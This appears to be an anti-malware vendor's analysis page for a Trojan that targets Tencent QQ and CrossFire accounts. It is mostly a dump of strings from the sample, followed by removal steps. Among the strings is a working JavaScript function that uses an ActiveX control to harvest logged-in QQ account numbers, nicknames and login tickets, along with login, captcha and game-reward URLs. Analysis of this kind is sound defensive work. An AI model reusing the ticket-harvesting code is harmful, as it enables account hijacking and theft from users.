z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert('Invalid RSA public key')
return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength()   7) >> 3);
var aD = this.doPublic(t);
var z = aD.toString(16);
if ((z.length & 1) == 0) {
N.prototype.doPublic = Y;
N.prototype.setPublic = q;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
au.prototype.am = aA;
if (ab && (navigator.appName != 'Netscape')) {
au.prototype.am = b;
au.prototype.am = az;
au.prototype.DB = ay;
au.prototype.DM = ((1 << ay) - 1);
au.prototype.DV = (1 << ay);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
ar = '0'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aG, z);
var aF = aG.length,
if (aG.charAt(aF) == '-') {
if (aE   aD > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aE)) - 1)) << aE;
this[this.t  ] = (t >> (this.DB - aE))
if (aE >= this.DB) {
aE -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aE)) - 1) << aE
this.clamp();
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
return '-'   this.negate().toString(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
if (aG < this.DB && (aH = this[aD] >> aG) > 0) {
aH |= this[--aD] >> (aG  = this.DB - aC)
aG  = this.DB; --aD
au.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1)   l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
aG = (this.s << z) & this.DM,
aD.clamp()
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
t = Math.min(z.t, this.t);
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = this.DV   aE
var t = this.abs(),
aE = z.abs();
aD[aC   t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
au.ZERO.subTo(aD, aD)
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z   t.t]  = t.am(z   1, 2 * t[z], aC, 2 * z   1, aD, t.t - z - 1)) >= t.DV) {
aC[z   t.t] -= t.DV;
aC[aC.t - 1]  = t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
var aQ = aK.abs();
var aI = this.abs();
aH.fromInt(0)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aI.copyTo(aG)
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {
aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT   (aG[aO - 1]   aR) * aS);
if ((aG[aO]  = aE.am(0, aD, aG, aN, 0, aM)) < aD) {
aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(au.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
this.reduce(z)
t.squareTo(z);
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(au.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aD = (z * this.mpl   (((z * this.mph   (t[aC] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z]  = this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
return au.ONE
aF = aI.convert(this),
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
if (aC < 256 || t.isEven()) {
return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromString = y;
au.prototype.clamp = Q;
au.prototype.dlShiftTo = at;
au.prototype.drShiftTo = Z;
au.prototype.lShiftTo = v;
au.prototype.rShiftTo = n;
au.prototype.subTo = ad;
au.prototype.multiplyTo = F;
au.prototype.squareTo = S;
au.prototype.divRemTo = G;
au.prototype.invDigit = D;
au.prototype.isEven = k;
au.prototype.exp = A;
au.prototype.toString = s;
au.prototype.negate = T;
au.prototype.abs = an;
au.prototype.compareTo = I;
au.prototype.bitLength = w;
au.prototype.mod = P;
au.prototype.modPowInt = ap;
au.ZERO = c(0);
au.ONE = c(1);
d(new Date().getTime())
if (navigator.appName == 'Netscape' && navigator.appVersion < '5' && window.crypto && window.crypto.random) {
var H = window.crypto.random(32);
for (K = 0; K < H.length;   K) {
W[ae  ] = H.charCodeAt(K) & 255
K = Math.floor(65536 * Math.random());
o.init(W);
for (ae = 0; ae < W.length;   ae) {
return o.next()
for (t = 0; t < z.length;   t) {
af.prototype.nextBytes = ax;
z = (z   this.S[aD]   aE[aD % aE.length]) & 255;
m.prototype.init = f;
m.prototype.next = a;
t.setPublic(aC, z);
return t.encrypt(aD)
return Math.round(Math.random() * 4294967295)
for (var B = 0; B < D.length; B  ) {
var C = Number(D[B]).toString(16);
if (C.length == 1) {
for (var A = 0; A < B.length; A  = 2) {
C  = String.fromCharCode(parseInt(B.substr(A, 2), 16))
for (var A = 0; A < C.length; A  ) {
B[A] = C.charCodeAt(A)
var A = C.length;
var A = E.length;
for (var C = 0; C < B.length; C  ) {
var A = u.length;
for (var B = 0; B < E.length; B  ) {
C[B] = E.charCodeAt(B) & 255
for (var B = 0; B < E.length; B  = 2) {
C[A  ] = parseInt(E.substr(B, 2), 16)
s.TEA = {
for (var B = 0; B < C.length; B  ) {
A  = String.fromCharCode(C[B])
return d.encode(A)
initkey: function(A, B) {
d.PADCHAR = '=';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';
d.getbyte = function(C, B) {
var A = C.charCodeAt(B);
d.encode = function(E) {
if (arguments.length != 1) {
var B = d.PADCHAR;
var G = d.ALPHA;
var F = d.getbyte;
var C = E.length - E.length % 3;
if (E.length == 0) {
A.push(G.charAt(H >> 18));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt(H & 63))
switch (E.length - C) {
A.push(G.charAt(H >> 18)   G.charAt((H >> 12) & 63)   B   B);
A.push(G.charAt(H >> 18)   G.charAt((H >> 12) & 63)   G.charAt((H >> 6) & 63)   B);
return A.join('')
if (!window.btoa) {
window.btoa = d.encode
var hex = str.toString(16);
var len = hex.length;
arr.push('\\x'   hex.substr(j, 2))
var result = arr.join('');
hexVcode = s.TEA.strToBytes(c.toUpperCase()),
vcodeLen = '000'   c.length.toString(16);
s.TEA.initkey(s2);
var saltPwd = s.TEA.enAsBase64(rsaH1Len   rsaH1   s.TEA.strToBytes(salt)   vcodeLen   hexVcode);
s.TEA.initkey('');
&appid=21000124&js_ver=10151&js_type=1&login_sig=XJ3RXmdJfvKA-*hz7TXwNTq902uwplhW6tRdiEFDhxMVRhi1bDCo0QdXVBbNxAfN&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&r=
function time(){return Math.random()}
hXXp://captcha.qq.com/cap_union_getsig_new?clientype=2&uin=
hXXp://captcha.qq.com/getimgbysig?clientype=2&uin=
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
pt_mbkey
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
&keyindex=9&pt_aid=21000124&daid=8&u1=http://cf.qq.com/comm-htdocs/login/logincallback.htm&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
&keyindex=9&pt_aid=15000103&daid=5&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&clientkey=
.PaH 
U]X%xw
O.vMk$
s.>.vc
%X~ -
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
,"iRet":"0","sMsg":"
modRet":{"iRet":"0","sMsg":"
"cdkey":"(.*?)"
[%d/d/d d:d]
\CF_CDKEY.ini
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
&extra=page=6
hXXp://bbs.cf.qq.com/forum.php?mod=viewthread&tid=
99998888
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=


&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
&searchkey=15051408311873756101000000000000&from=1&question=免费枪&vip=0&bangdou=1
%7C322%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
sMsg":"
bHasSendFailItem":"0","iRet":"0","sMsg":"
hXXp://apps.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=79968&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams2.02.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/jsonp.php?_c=page&actid=5474&isLoadUserInfo=1&callback=page.signInCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://share.music.qq.com/fcgi-bin/dmrp_activity/fcg_feedback_send_lottery.fcg?activeid=110&rnd=1458872103167&g_tk=
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
hXXp://vip.qzone.qq.com/fcg-bin/v2/fcg_mobile_vip_site_checkin?t=0.46869834180487055&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Host: qiandao.qun.qq.com
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
hXXp://cfzhushou.com/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
&collect=yehFdbVCaf6iRVmDtqzeLJS11vU2naOwqvdxlLqGgQgGJ4_1_XDmcUqe-XbQfHy6_zKOfL_dTnSV5_S5FuHtVYE2M64qMUdEQwAofTHRuzp5HPhYJuWiJRwtmyS8dEllMsGR5MxIy6kK3cCNw9aOvyKUaV8xygen57rNX0BAzkOOtzxtXLSOnSV6prBECoE5JCuV_pDIt_Hl6Vy4fWiQrRmAoS2Dud5MMasCnWCHonOwKhub5TaOuEpjfoEAF2ResP3i32BFRog1PO8WIxl4D__-61X3q-C4RD3jR5GbftwSIPPU8chK9rrwr5I3XW-yGYyNLKKfSvRl4CIRSmenCQw9MdOLMBA-Kq3wA-Isq5nFFis-2uJm8OdDb0rcVGZZM8lF5eN_dSLgHOFx-kGUSWkuLYx9QHR-_3K4B4wu907rpbKeobTewmLGw6-az0VkyJSlwRdFjciqcUFPdpy3kuIDdh9P6JnGiMb16ADzfjA8KdwuUZaXG40CKTsTX6L-kjN-f2iYbkyQP1NS8oaBXXCCGHHToXvb8lGeiMud00_wtNjKywve0slKxZhcDZlcNcagw0WtCD8ckxCANdo2WinaIWzyApgf1gMl_pRAtgsH1PMmglKLLnmoZo86HGTPDAoyMzzQF5MMdTJ2LYKwxSK2swj4yeKX3jPZHOuYt74*&ans=
hXXp://captcha.qq.com/cap_union_verify_new?clientype=2&uin=
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=48025&sServiceDepartment=group_f
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=45566&sServiceDepartment=group_f
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
&e_code=0&g_code=0&eas_url=http://daoju.qq.com/mall/judou2.0/cf.shtml&sServiceDepartment=djc&sPartition=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.6722960381302983
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=42715&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
.text
`.data
@.reloc
KERNEL32.dll
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 00:00:00
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
{D30C1661-CDAF-11d0-8A3E-00C04FC9E26E}
document.all.resultjs.innerText=
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');
SysShadow.Menu
Microsoft.XMLDOM
14:00~16:00
12:00-19:00
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
msscript.ocx
VVV.dywt.com.cn
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
%d%d%d
rundll32.exe shell32.dll,
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
GetCPInfo
WinExec
RegOpenKeyExA
RegCreateKeyExA
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetKeyState
GetKeyboardState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
InternetCanonicalizeUrlA
InternetCrackUrlA
`.rdata
@.data
1.0.15.507
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0

%original file name%.exe_2712_rwx_01EF0000_00013000:

.text
`.rdata
@.data
.rsrc
@.reloc
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
<fd:%d>
%c%c%c%c%c%c%c%c%c%c
MSVCRT.dll
KERNEL32.dll
zlib1.dll
!"#$%&'()* ,-./012
DLL support by Alessandro Iacopetti & Gilles Vollant

svchost.exe_992:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385

%original file name%.exe_2712_rwx_10001000_00033000:

f9z.vk
@Microsoft.XMLDOM
dwmapi.dll
Riched20.dll
Riched32.dll
{00000000-0000-0000-C000-000000000046}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
kernel32.dll
ole32.dll
gdiplus.dll
GdiPlus.dll
gdi32.dll
user32.dll
Advapi32.dll
advapi32.dll
User32.dll
ntdll.dll
Ole32.dll
shell32.dll
atl.dll
program internal error number is %d.
:"%s"
:"%s".
GetProcessHeap
&..0`%X
.text
`.rdata
@.data
.rsrc
.reloc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4OBULSVD.txt (128 bytes)
    C:\exdui.dll (110 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now